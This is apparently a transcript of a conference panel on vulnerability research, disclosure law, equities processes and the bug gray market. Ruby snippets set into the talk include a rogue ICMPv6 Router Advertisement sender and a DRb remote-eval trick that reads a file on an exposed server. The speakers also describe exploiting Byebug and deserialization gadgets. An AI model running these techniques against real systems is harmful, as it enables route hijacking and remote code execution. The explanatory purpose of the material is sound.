Hey, thanks again, and welcome back to our Q&A session. And hello, Addison, thanks for joining us. So we had this absolutely awesome track on vulnerability research, and we have more or less everyone here with us. Iwan had to leave for another meeting; I guess we are all accustomed to this by now. For my first question, I was very much interested in taking up a few of the questions that came in through the slides. So, thinking of our first speaker: Pedro, this one is for you, before I get to troll about IPv6. Someone asked: how does OpenWrt or pfSense stack up against the closed-source firmware that's being used?

Okay, that's a pretty good question. Personally, when I buy a router, I always look for one that supports OpenWrt or DD-WRT; pfSense I haven't used. They're all much the same. But to be honest, I never really audited OpenWrt or DD-WRT myself, though I have audited routers that use OpenWrt as a base. Some manufacturers take OpenWrt and then extend it, and the base is pretty secure. Usually when we find a router running OpenWrt, its base is pretty secure, so we go looking for the vendor-specific additions. So I'd say the OpenWrt and DD-WRT code is much better than almost every consumer router vendor's code, but again with the caveat that I haven't really audited it myself. But I use it, so yeah.

Thanks, sorry, I was muted. Thanks for this one. As I said, this may also be something Ivica can jump in on. To my knowledge, there is little expertise on, say, IPv6 packet filtering. So considering your expertise on either the protocols or the equipment, can you give us some forecasting of sorts? Can you elaborate on specific vulnerabilities we can expect in the coming years, in protocols and in the equipment that will need to handle them, that we are not so well versed in, that we don't have so much expertise in?

There are a few around already. One of them is recent: the fact that IPv6 implementations interpret some strings that look like URLs as addresses. If I'm not mistaken, this was used recently in an exploit; I can't remember exactly which, but I'm sure it's easy to find on Google. So that's one example. Another example is IPv6 autoconfiguration. While it tries to reduce complexity, it also introduces an unexpected attack surface, right? Vendors typically have a lot more experience with IPv4 than with IPv6, so they tend to see IPv6 as an add-on and forget the existence of SLAAC autoconfiguration and that kind of thing. This might open up new avenues for exploitation. And then we also have firewall bypasses. It can be as simple as: you have a service listening on all interfaces, it also binds to IPv6, and you forget to firewall IPv6. It can be a simple mistake, you know? And finally, there is attacking the implementation itself. Most devices will use Linux, which is, so to speak, more secure, since more eyes are on it. But some vendors have their own internet protocol implementations, and there I'm sure there will be a lot of bugs in those custom stacks. My guess is that the number of bugs is not going to decrease anytime soon.
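To make that last failure mode concrete, here is a minimal Ruby sketch of the pattern (the port number is arbitrary): a wildcard IPv6 bind that, on a typical dual-stack Linux host, quietly serves IPv4 clients as well.

```ruby
require 'socket'

# A service that binds the IPv6 wildcard address. On a typical dual-stack
# Linux host (net.ipv6.bindv6only = 0), this one socket serves both native
# IPv6 clients and IPv4 clients (seen as v4-mapped ::ffff:a.b.c.d). If the
# host's firewall rules only cover IPv4 (iptables), native IPv6 connections
# sail straight past them: ip6tables needs an equivalent rule.
server = TCPServer.new('::', 8080)

loop do
  client = server.accept
  puts "connection from #{client.peeraddr[3]}"
  client.close
end
```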
Still, since we are on the protocol topic: Ivica, would you like to jump in on that question right now? Yeah, with pleasure.

Let me share one little, innocent story from recently. I was playing around with Windows Server 2019 and 2016, and I realized they have the IPv6 stack enabled by default, and Microsoft recommends not disabling it. I was actually investigating something around rerouting, injecting routes, and what I discovered is that you can pretty quickly develop the mechanics, or the code, to inject router advertisements, or routing information, into the IPv6 stack of any Windows server. At first I was surprised: why, or how, can you do that? But when I thought a little more about it, I concluded it's actually legitimate functionality. Something like this exists even in the IPv4 world, where you have ICMP redirects, which most environments today will forbid; a very similar thing existed in IPv6. I wasn't quite sure how to interpret that result, so I contacted Microsoft and explained how the whole thing went, and it was aligned with my expectations: they said that's not a bug, that's not a security flaw, it's legitimate functionality. And I fully agree with that. The only thing I wondered is: why would you leave that on by default? Why would Windows servers need to have any of the IPv6 routing machinery enabled by default? That's the question that remained open. And yes, to answer your question, IPv6 is coming in a big way. Probably the biggest security issue for now is that we don't know much about the protocol, because it's not so widespread. We surely know how to use the addresses and assign them, but the security intricacies of it? That remains to be seen in the coming years, I guess, and decades, I believe.
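A rough sketch of the mechanics being described, for a lab only: a bare ICMPv6 Router Advertisement pushed to the all-nodes multicast address. It assumes a Linux sender with root, and the interface name `eth0` is a placeholder.

```ruby
require 'socket'

# Lab-only sketch: craft a minimal ICMPv6 Router Advertisement (type 134)
# and send it to ff02::1 (all nodes). Needs root on a Linux box.
sock = Socket.new(Socket::AF_INET6, Socket::SOCK_RAW, Socket::IPPROTO_ICMPV6)
# Hosts only accept RAs that arrive with hop limit 255 (RFC 4861).
sock.setsockopt(Socket::IPPROTO_IPV6, Socket::IPV6_MULTICAST_HOPS, 255)

ra = [
  134, 0, 0,  # type = RA, code = 0, checksum = 0 (kernel fills it in)
  64,         # current hop limit suggested to hosts
  0,          # flags: no managed / other-config bits set
  1800,       # router lifetime in seconds ("I am your default router")
  0, 0        # reachable time, retrans timer (0 = unspecified)
].pack('CCnCCnNN')

sock.send(ra, 0, Socket.sockaddr_in(0, 'ff02::1%eth0'))
```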
Yeah, we need some more foresight on emerging threats, not just emerging technologies but also threats to existing ones. I'll get back to you in a minute. I want to give Florian and Stephanie the opportunity to tell us whether they're aware of any recent cases of Canadian security researchers being prosecuted under the Criminal Code because of their research. In other words, has it ever gone wrong for someone who, with good intentions, tried to disclose a vulnerability?

I'll hand that off to Florian, who is the legal expert here. Yes, and I would add Iwan to this, who as I said had to leave, because she's doing her LL.M. thesis on exactly this topic. It's kind of a gray area. We know of some cases, and there is case law, decisions using those provisions, but very few, at least publicly available, and often in those cases people are under gag orders and so on, so it's very complex to know exactly how the law was used. But we have heard of many cases. That's why we started this research project: to try to better define the framework and maybe call for law reform to better protect defensive hacking and vulnerability disclosure, et cetera. And it's also within that framework that Stephanie and Iwan are now working on the report.

Thanks. Another question that came up is whether you have heard of the Communications Security Establishment's Equities Management Framework, and if yes, what do you think about it? Because I think your discussion was about another entity's equities approach, to reuse the U.S. term. Over to you.

Well, yes, during our presentation we did mention the CSE's equities framework and their process, and we have heard of the framework. It has been available since March 2019, but it is really, really short and opaque. I have several critiques of it. One is that only parties within the CSE are involved in the process. Unlike the U.S.'s Vulnerabilities Equities Process, which they call the VEP, where a range of people from different departments represent the agencies' views, in the CSE's framework it's just CSE members deciding whether or not to disclose or withhold vulnerabilities. Also, the framework is really short. The U.S.'s unclassified VEP is super thorough; the CSE's doesn't offer information like what's in scope of the framework, the exceptions, or a thorough detailing of the responsibilities of the actors involved, things like that. And my last critique is a small one, because you could argue that what the U.S. has is symbolic: their VEP has one transparency mechanism, annual reporting, which at the very least provides some information on the yearly activities done under the VEP procedure. The CSE doesn't have anything like that. It's a very short document, not comprehensive, and it leaves us with more questions than answers. Yeah, don't get me started.

And if I may add... Go ahead. Maybe the new framework, well, "framework" in quotes, that short document, doesn't provide us with any guarantees, any safety guarantees for security researchers, to be sure that if they come forward and turn to the government to help out, it's going to help society, and not help the government against society. And there's some conversation right now in the national security and intelligence community, as part of the reviews of the agencies' practices by NSIRA, which is like the watchdog of the national security agencies in Canada, to look into those kinds of practices and make sure they build trust with the security research community, so that researchers can believe the government will support this and not use their research to hack citizens.

Yeah, I mean, coordinated vulnerability disclosure, and the vulnerability research that we are all doing one way or another, is all about protecting users, because at some point each of us is someone's end user. But we'll get back to this in a minute. I wanted to reach out to Jeff and Addison. Okay, I'm a Ruby noob extraordinaire, that's incontestable, but still, I'm not sure the framework you were presenting tonight is a very well known one. So I got curious: what's the backstory? How did you come to work on that?

So, as we quickly walked through at the beginning of the talk, there was this Java instrumentation thing I was building, and to implement the instrumentation hooks and keep it quick and simple, the hooks were implemented in JRuby. You could script them up on the fly and load them without compiling anything. And we got it working with a live REPL, so you could essentially inject the REPL into a Java process and poke around from there with standard reflection-esque navigation. The REPL was this thing called pry-remote. Pry is kind of the high-end REPL for Ruby, better than IRB, the default one.
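For anyone who hasn't seen it, the usual pry-remote pattern is roughly this sketch; `Worker` and `job` are made-up names.

```ruby
require 'pry-remote'

class Worker
  def process(job)
    # Opens a Pry REPL served over DRb, by default on localhost:9876;
    # running `pry-remote` on the command line connects to it. Bind it
    # to a non-loopback interface and anyone who can reach the port
    # gets an interactive Ruby shell inside this process.
    binding.remote_pry
    job.run
  end
end
```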
And pry-remote did all of this forwarding of the calls between the separate processes with this DRuby stuff. The moment we started looking at it, it was really crazy, because we were trying to make it so that, among other things, the traffic was locked down and couldn't be messed with. And meanwhile, we have this thing that is plain text: you can just connect to the server from anywhere; if it's exposed, you can send it commands. We started looking at this and thought, there's no way we can release this thing while it's so exploitable. And it went on from there.

Essentially, pry-remote, from what I understand, is used as a sort of debugging aid, drop-in debugging, especially when you're debugging some Ruby running in, say, a Rails app on a remote server, and you want to just drop to a shell and poke around, see what's going on with the variable state, things like that. Byebug is a different thing, the kind of debugger that everyone uses for Ruby, and it itself has a wacky text-based protocol, plain text over the network. And I've seen some interesting things there: we were dealing with some auditing a while back, and there was an arbitrary `send` that could be issued from some endpoint in an app. We couldn't really control the arguments too well, but we were able to reach Byebug, which caused it to just start listening on a port on the server. We then connected to that and had it run arbitrary Ruby to compromise the system. That was an interesting POC. But all of these kinds of debugging aids seem to have very simplistic networking, protocol-wise, with possibly little thought given to security around them. Ruby can sort of wrap the traffic in TLS, although the relevant APIs still call it SSL, which gives you a hint at how well maintained that is.

Something we didn't get into in the talk is that there is technically a system for access controls, for saying which hosts can talk to what. But because you can smuggle those proxy objects into things, if you can trick one node in a distributed group into talking with you, then even if you couldn't get code execution for whatever reason, you could still potentially smuggle in an object that references another one of the hosts in the network, and that lets you talk to the thing you're not allowed to talk to. You can essentially crawl the whole graph of it, node to node, that way. It gets a little wacky.
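To see why an exposed DRb endpoint is so dangerous, here is a minimal local sketch of the pattern under discussion: made-up names, loopback only, with the client half shown in comments.

```ruby
require 'drb/drb'

# Server half: an innocuous-looking front object.
class Front
  def ping
    'pong'
  end
end

DRb.start_service('druby://127.0.0.1:8787', Front.new)

# Client half (run in a second process):
#
#   remote = DRbObject.new_with_uri('druby://127.0.0.1:8787')
#   remote.ping   # intended use => "pong"
#
#   # DRb dispatches any *public* method name a client asks for, and
#   # Object#instance_eval is public. Calling method_missing directly
#   # on the proxy forces the call over the wire (the proxy has its own
#   # local instance_eval that would otherwise shadow the remote one):
#   remote.method_missing(:instance_eval, 'File.read("/etc/hostname")')

DRb.thread.join
```

The point of the sketch is that nothing in it is a bug: it's the documented dispatch model, which is exactly the tension the speakers describe.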
Yeah, that sounds very interesting. I'm trying to behave here. But at some point you had to talk to, well, the people who wrote this, right? I mean, we are in a vulnerability research, disclosure, and management track, so I sort of have to ask this question: what happened there? How did it go?

So the interesting thing is that the Ruby documentation says it's insecure and not to expose it to untrusted things, which is often how it goes with arbitrary deserialization. It's like: don't do Java deserialization unless you trust the data coming in. And, well, can you ever trust the data coming in? So we reached out to them with this information, the fact that, because of all these other things, the clients are also exploitable. And they kind of took that information and sort of disappeared with it.

And unfortunately, the protocol is kind of set in stone as it is; functionally, I don't think it can really change, because of the backwards compatibility it strives for. What we were hoping to see come out of it was that the documentation would be updated to reflect the additional dangers of using this, and I don't think that ended up happening. But again, it has been known to be completely insecure. They themselves say: this is dangerous, don't speak this protocol with things you do not trust; just not necessarily in a way that gives the proper warning. So given all the other things, the protocol is essentially known to be insecure and vulnerable in a whole bunch of ways, and we didn't treat it directly as having exploits against it, because a lot of this was mostly exploitation techniques for known problems, to a certain degree, exercising all the things related to the protocol itself. But for Metasploit, on the other hand, whose users did not expect to be using this thing or to have that problem, we reached out directly and said: this is a vulnerability you need to deal with, because the API is what it is.

No one is really going to go to Sun or Oracle and say, hey, you need to yank this entire Java deserialization thing from the language, it just can't be allowed to exist. But you go to every single person who does deserialization and you say, hey, you're exposing this, you need to stop doing that. And then, alternatively, people also go to the libraries that have the gadgets and say, hey, you need to fix your gadget so it isn't exploitable. But really the problem is the deserialization in the first place, not the gadget. Though in a couple of instances, it seems like there have been universal Ruby gadgets, built into the core Ruby standard library even. I've tried to find a couple; I've gotten close now and then, and other people have found these really amazing ones. There is one, in fact, that we're using as part of our fully weaponized CLI script. But who knows if they'll patch something in a minor version update and break it. That's why, when targeting the older version of the Metasploit payload, we still use the ActiveRecord serialization thing, because it's just completely reliable, effectively. There have been some changes between super old versions of Rails, and I actually once had to rework that payload to target, I want to say, Rails 2 or 3 that was still in existence somewhere, because the class structure in the existing payload had actually changed: at some point in the middle of the nested objects, something that was a class became a module, or a module became a class, so the default payload didn't work and I had to rewrite the way the gadget was created. It was in fact still the same gadget; I just had to restructure it.

So my personal take is that the gadgets are not the problem. It's the unsafe deserialization, where the data can control its own destiny, effectively, by saying "I am a Foo object." No, you should not be able to say you're a Foo object containing a Bar or a Baz object inside of you. You are what I tell you to deserialize as, which is how Protobufs work, and how typical JSON-to-object mapping works in Java: those are safe. Everything that has magic that can control what it deserializes as is fundamentally broken as an archetype.
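In Ruby terms, the contrast he's drawing looks roughly like this; it's a sketch, and `User` and the inputs are made up.

```ruby
require 'json'

User = Struct.new(:name)

# Unsafe shape: the incoming bytes decide which class gets instantiated,
# so any gadget chain reachable through Marshal is in play.
untrusted_bytes = Marshal.dump(User.new('mallory')) # attacker-controlled in reality
obj = Marshal.load(untrusted_bytes)                 # could deserialize as any class

# Safe shape: the receiver decides the type; the input is only ever data.
untrusted_json = '{"name":"mallory"}'
data = JSON.parse(untrusted_json)    # yields only Hash/Array/String/Numeric/bool/nil
user = User.new(data.fetch('name')) # explicit construction of a fixed class
```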
Yeah, I think we are set here for a huge structural thing, you know. So, Florian had to leave for another meeting, because on your side, guys, it's still daytime, I guess. I have a question for Ivica, because I was very much mulling this over as you were concluding your talk earlier. You're publishing the proof of concepts of what you presented, and I was wondering: what is the risk model, or the threat model if you like, of this publication? It's always a question of how much I am providing something to be studied and examined by anyone in the community, versus how much this thing can be more or less readily used by, well, not very well intentioned people. And if they could use it, can you elaborate a little on the cost-benefit ratio for a potential attacker who would basically build on your proof of concept? Thanks.

So the existing payloads to, like, compromise any general... Sorry, the question was for Ivica. No, no, don't worry.

Okay, so there is one thing I would say distinguishes my presentation from the other guys'. The other guys are very sophisticated; they really found vulnerabilities in the products. In my case, I did not find any buffer overflow, any irregularities in input processing, in directory traversal or whatever. I'm actually using completely legitimate behavior of the protocol as described by the RFC. The only thing I did was change the attributes that say "this is A" to say "this is B", where both A and B are legitimate. So in a sense, this exploit is actually not an exploit; it's just playing within the boundaries that define the legitimate protocol. In that sense, sure enough, it can be abused, because obviously impersonating or spoofing a device, especially if it can be proven it was done for a malicious purpose, is a bad thing. And yes, there is always a risk in making exploits, or write-ups about certain vulnerabilities, public. But then it's kind of a chicken-and-egg dilemma: if we don't expose this stuff, vendors might never be enticed to actually fix it. On the other hand, exposing it obviously presents the risk that a malicious actor will misuse it and attack other parties. It's like everything; it's like the scientists who invented, well, who realized and understood how to split the atom, and once they saw the demonstration of power at Hiroshima and Nagasaki said: oh, I regret that I ever did that. But it's in human nature, I guess, to use and abuse whatever comes out of any science. So I guess it's an inherent problem of how people perceive the opportunities to either do harm, or promote themselves, or help society. You cannot say that any technology is good or bad; it's only as good or as bad as people intend it to be when they use it. So it's difficult. I guess the morals or ethics behind using these tools are what determine your actions and the consequences.

Sure. I mean, it's a very delicate balance to strike, and I've been trying to play devil's advocate here, because this gets me to my second and concluding question, which is to all of you.
This is the kind of counterargument we hear when trying to promote wider publication of security research, more transparency from the vendor side and from the government side, the whole VEP discussion we just had earlier, and also when trying to promote more community-based improvement of the technology we all use. So my concluding question, since we have this very interesting and rich set of skills and points of view here: what would be your crossed recommendations, from technology people to policy people and from policy people to technology people? For example, something that didn't come up earlier, but that we all do at some point, is reverse engineering something: going beyond what is just visible. If you have an app, you can always do a static analysis that gives you close to zero knowledge, very little. So say I decide to go further and reverse whatever Java mobile app I have there, because I'm well intentioned and I think this is the only way for me to identify any potential vulnerabilities, stuff that can cause harm. And then I go and report, I disclose this vulnerability, because I'm a candid and well-meaning person. So, from a technical point of view, I need to do this, and I like it. From a policy point of view, I don't know how it is in Canada, but in Europe, for example, you cannot just do reverse engineering as you please; it's only accepted in very specific cases. And, yes, okay, we are on the record, but off the record, there are many of us trying to change that state of affairs. That's the kind of thing I mean: what would be your recommendations, from technical people to policy people and from policy people to technical people, on how we can move forward, as a community and as a society, using technology that is no longer a privilege, to make technology less vulnerable, I would say more secure, but actually less vulnerable, and to make people more responsible for the vulnerabilities they do or do not fix? Over to you, Addison, perhaps; we haven't heard from you yet, so if you want to take this one first.

I think something interesting to point out, from the point of view of a penetration tester, someone who finds vulnerabilities in systems, is that there's a very clear trade-off you make: either you disclose the vulnerability to the parties affected, or you sell the vulnerability. And I think the selling of vulnerabilities is something that's often overlooked, especially by the people who make policy decisions, but it is very easy to do; the people who buy vulnerabilities make it as easy as possible. As someone who finds vulnerabilities, you're doing a public service by disclosing them to the people who actually write the software, or the people who actually use the libraries you find a vulnerability in. And as someone who finds vulnerabilities, I want the world to be a better place. So I tell the people who write the software: hey, you have a bug here. Hopefully they also agree that it is a bug, and hopefully they see the need to fix it. Sometimes you get pushback, and depending on how strongly you hold your moral beliefs, you will argue the point. But really, you're fighting against a system where there is another side to this.
And this other side will pay you very generously to buy these vulnerabilities and not disclose them to the people who write the software. From the policy side, it's very easy not to look at this, because very often, from a policy perspective, as soon as you know about a vulnerability, you're now liable for it. Legally, this puts you in very hot water, in a situation you don't want to be in, and having random people on the internet show up and tell you about vulnerabilities in your systems is not something you ever want to happen. And I feel like this is a very difficult situation we're in, as far as the internet and society go. We need to find some solution to this problem, so that people like me who find vulnerabilities in systems can go up to someone in a security role at some large corporation and tell them about a vulnerability without them taking it as a threat in any way, so that they can take it as the free help I intend it to be. A lot of the time it's assumed to be some sort of offensive attack on their systems, and that puts me in a difficult position, and maybe it's easier for me to just sell that vulnerability. That's the thing that, as a society, we need to stop: we need to stop making it so beneficial for people like me to sell these vulnerabilities, and make it more beneficial to provide them to the people who have the power to fix them.

Yeah, for what it's worth, I participate in different policy working groups at the international level, and that question of how we dry up the gray market for vulnerabilities is on the table. It's just that the timeline in policy is not the same as in technology, so bear with us as we try to come up with something. I mean, there have been discussions about asking governments to be the recipients of those vulnerabilities, to try to counteract the gray market, and you think: yeah, I'm not sure many people would be happy with governments not communicating anything and hoarding vulnerabilities instead. So, the timeline is not the same, but who else wants to pick this up? Yeah, Stephanie, go ahead. What recommendations do you have for the tech people?
Well, definitely, to keep these vulnerabilities from going into the illicit markets, it's about incentivizing good behavior, and I think a huge part of that is having the policymakers set the rules of the game, so that when security researchers have a vulnerability, they know what type of activities are allowed. A lot of coordinated vulnerability disclosure policies let you know the scope of activities that are allowed: they'll say pen testing is not allowed, or, if you see personal information, don't delve into it too much, things like that, to set the rules of the game so everyone is confident in what they're doing, and so security researchers trust that when they disclose a vulnerability, they're not putting themselves in trouble, not facing legal liability for doing it. And at the end of the day, it's about making sure these relationships are fostered, because security researchers do want to help, and there are ways to make sure these vulnerabilities aren't going to be exploited and used for bad purposes.

Sure. Pedro, I'm seeing your t-shirt, you want to jump in? Because I remember the time when we called CVD "responsible disclosure", and then everyone got worked up over who is responsible for what, so we tried to change the name, right?

Yeah, I mean, I agree with everything that has been said; however, there are some very big problems. The first one is with regard to incentives. Okay, so assume I am amoral, I am a hacker, I have skills, and I find a vulnerability in whatever. Why should I report it to the manufacturer, when they're going to give me a headache, they're not going to give me anything except trouble, when I can go to the gray market and get money for it, completely anonymously? Also, Reine, you said that in Europe it is illegal to do reverse engineering. I don't live in Europe anymore, but I lived there for many years, I published many vulnerabilities, and no one ever came after me. So basically, there is no enforcement whatsoever of this law, unless you piss off the wrong company and they go after you, but even for a company with a lot of lawyer money, that's quite hard to do. I think the big problem here is really a question of incentives: you have to incentivize people to come to you. I'll give you an example from my talk on consumer router vulnerabilities. I can't remember the exact numbers, but if you go to Netgear, they have a bug bounty, and I think they offer 10,000 dollars for a remote code execution vulnerability; on the gray market, not even the black market, the gray market, you get a lot more. And they never pay the top 10k anyway; they always find an excuse to pay less. We're talking about a company with hundreds of millions of dollars in revenue, maybe a billion, I think they're over a billion, and they're paying peanuts. You pay peanuts, you get monkeys, simple as that. So there's this incentive side. And then, from the policy side, trying to control this kind of thing is really sticking your finger in the dam. You can put all the rules you want in policy, but I don't care: I take all your rules, I throw them out of the window, I do my research, I sell on the gray market, and what are you going to do? So you can't really... of course, you have to have some rules, but they cannot be restrictive; they have to give you a legal framework, and that, with the proper incentives, specifically financial incentives, is the only way to control the problem.
Because otherwise it's like, for example, how do you control cryptocurrency, which is very much in the news now? You'd have to shut down the internet, right? There's no way to control cryptocurrency except by trying to shut down the internet. And it's the same thing with vulnerability research, in a completely different way: it's happening everywhere, underground, and you cannot try to control it; you have to try to mold it into the shape you want.

So, as much as I would like to continue the discussion, I think there are other tracks coming after us, but please feel free to continue the discussion over on Discord. Sorry if I missed giving the floor to someone. In any event, this has been absolutely great; I've learned so much, including much more than I ever suspected about DRuby. So thanks again, stay safe, and I'm very much hoping we can meet someday in person when things settle down. Thank you so much, have a good day or evening, bye.